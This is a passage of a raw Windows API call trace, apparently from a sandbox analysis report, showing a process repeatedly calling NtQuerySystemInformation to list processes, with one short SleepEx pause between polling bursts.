SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe408) returned 0x0 [0240.884] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0243.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.456] NtQuerySystemInformation (in: 